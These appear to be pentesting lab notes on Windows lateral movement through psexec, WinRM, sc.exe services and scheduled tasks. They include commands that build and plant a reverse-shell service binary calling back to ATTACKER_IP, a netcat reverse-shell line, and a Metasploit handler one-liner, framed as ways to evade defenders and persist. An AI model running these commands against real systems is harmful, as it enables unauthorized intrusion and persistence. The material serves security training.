## General Spawning Processes Remotely allows an attacker to create a new service on the target machine and associate it with a payload, which can provide a more persistent reverse shell connection that would survive a reboot of the target machine and provides a persistence mechanism for the attacker. This is better than a normal netcat reverse shell as it allows the attacker to have more control over the service and configure it to run automatically, and also allows the attacker to run the service with higher privileges than the current user. - More information Spawning Processes Remotely is a technique to execute commands or run applications on a remote system without direct login. It can be done using various tools such as: ㅤ - **psexec**: Allows execution of processes on remote systems, it can be used to run commands or launch GUI applications on remote systems. - **winRM**: Windows Remote Management, it is a Microsoft protocol that allows administrators to execute commands on remote systems, it can be used to remotely execute commands, scripts, and other tasks. - **sc.exe**: A command-line tool that allows you to remotely manage and control services on a Windows system. ㅤ One use-case is to add an executable file to a target system and add it to the PATH. This can be achieved by: ㅤ - Using smbclient to transfer the executable file to a directory on the target system. - Using sc.exe to create a new service and configure it to run the executable file. - Adding the path of the executable file to the PATH environment variable so that the system can find the executable file when it is run. But why using Spawning Processes Remotely? - Bypass some security feature enable on the target machine - The system may not have SSH or other remote access methods enabled or configured. - The attacker may not have valid credentials for the system. - Spawning a process remotely may allow the attacker to bypass security controls, such as firewall rules or intrusion detection systems. - Spawning process remotely can be used as a way to gain persistence on the remote system. - Spawning process remotely can help to hide the attacker's presence and activities on the system, making it more difficult for security personnel to detect and respond to an intrusion. ***The choice of technique may depend on the specific situation and the target's security controls. For example, if the target has a firewall that blocks certain ports (Example RDP and SSH are closed), an attacker may choose a technique that can bypass or circumvent the firewall.*** ## Commands ### Psexec - **Ports:** 445/TCP (SMB) - **Required Group Memberships:** Administrators PsExec is a command-line utility developed by Sysinternals (now owned by Microsoft) that allows a user to execute processes on a remote system. It can be used to start a program on a remote computer and interact with it as if it were running locally. Example The way psexec works is as follows: ㅤ 1. Connect to Admin$ share and upload a service binary. Psexec uses psexesvc.exe as the name. 2. Connect to the service control manager to create and run a service named PSEXESVC and associate the service binary with `C:\Windows\psexesvc.exe`. 3. Create some named pipes to handle stdin/stdout/stderr. ㅤ ![psexec explained](https://tryhackme-images.s3.amazonaws.com/user-uploads/5ed5961c6276df568891c3ea/room-content/a488102fe0da47a3667961400cf298d8.png) Command ```shell-session psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe ``` - Download [Here](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) ### WinRM - **Ports:** 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS) - **Required Group Memberships:** Remote Management Users Windows Remote Management (WinRM) is a web-based protocol used to send Powershell commands to Windows hosts remotely. Most Windows Server installations will have WinRM enabled by default, making it an attractive attack vector. CMD ```shell-session winrs.exe -u:Administrator -p:Mypass123 -r:target cmd ``` - -u option is used to specify the username - -p option is used to specify the password - -r option is used to specify the name or IP address of the remote system. PowerShell ```powershell $username = 'Administrator'; $password = 'Mypass123'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; ``` ```powershell Enter-PSSession -Computername TARGET -Credential $credential ``` ```powershell Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami} ``` ### SC - **Ports:** - 135/TCP, 49152-65535/TCP (DCE/RPC) - 445/TCP (RPC over SMB Named Pipes) - 139/TCP (RPC over SMB Named Pipes) - **Required Group Memberships:** Administrators Windows services can also be leveraged to run arbitrary commands since they execute a command when started. While a service executable is technically different from a regular application, if we configure a Windows service to run any application, it will still execute it and fail afterwards. Example 1. A connection attempt will be made using DCE/RPC. The client will first connect to the Endpoint Mapper (EPM) at port 135, which serves as a catalogue of available RPC endpoints and request information on the SVCCTL service program. The EPM will then respond with the IP and port to connect to SVCCTL, which is usually a dynamic port in the range of 49152-65535. ㅤ ![svcctl via RPC](https://tryhackme-images.s3.amazonaws.com/user-uploads/5ed5961c6276df568891c3ea/room-content/c4f288e73da9c0f4d480ad817b365fe5.png) ㅤ 3. If the latter connection fails, sc will try to reach SVCCTL through SMB named pipes, either on port 445 (SMB) or 139 (SMB over NetBIOS). ㅤ ![svcctl via named pipe](https://tryhackme-images.s3.amazonaws.com/user-uploads/5ed5961c6276df568891c3ea/room-content/0c425c37d692c771c944e38dca8c5879.png) Create an EXE that will be run by SC ``` msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=ATTACKER_IP LPORT=4444 -o myservice.exe ``` Adding the EXE file on the target Machine (Via SMB) ``` smbclient -c 'put myservice.exe' -U USER.AD -W ZA '//MACHINE.DOMAIN/SHARE$/' PASSWORD_OF_USER ``` - W option is used to specify the workgroup or domain of the SMB server. Launch Meterpreter (One Liner) ``` msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST lateralmovement; set LPORT 4444;exploit" ``` Using Runas to get a revershell from the USER (Get user Permission) ```shell-session C:\> runas /netonly /user:DOMAIN\USER "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443" ``` - Explaining Since `sc.exe` doesn't allow us to specify credentials as part of the command, we need to use `runas` to spawn a new shell with t1_leonard.summer's access token. Still, we only have SSH access to the machine, so if we tried something like `runas /netonly /user:ZA\t1_leonard.summers cmd.exe`, the new command prompt would spawn on the user's session, but we would have no access to it. To overcome this problem, we can use runas to spawn a second reverse shell with t1_leonard.summers access token Commands (Create Process, adding the process to the path and linking it to the EXE file) ```shell-session C:\> sc.exe \\MACHINE_DOMAIN create PROCESS_NAME-3249 binPath= "%windir%\myservice.exe" start= auto C:\> sc.exe \\MACHINE_DOMAIN start PROCESS_NAME-3249 ``` The "net user" command will be executed when the service is started, creating a new local user on the system. Since the operating system is in charge of starting the service, you won't be able to look at the command output. To stop and delete the service, we can then execute the following commands: ```shell-session sc.exe \\TARGET stop THMservice sc.exe \\TARGET delete THMservice ``` ### Scheduled Tasks Another Windows feature we can use is Scheduled Tasks. You can create and run one remotely with schtasks, available in any Windows installation. Command ```shell-session schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "" /sc ONCE /sd 01/01/1970 /st 00:00 schtasks /s TARGET /run /TN "THMtask1" ``` We set the schedule type (/sc) to ONCE, which means the task is intended to be run only once at the specified time and date. Since we will be running the task manually, the starting date (/sd) and starting time (/st) won't matter much anyway. Since the system will run the scheduled task, the command's output won't be available to us, making this a blind attack. Finally, to delete the scheduled task, we can use the following command and clean up after ourselves: ```shell-session schtasks /S TARGET /TN "THMtask1" /DELETE /F ```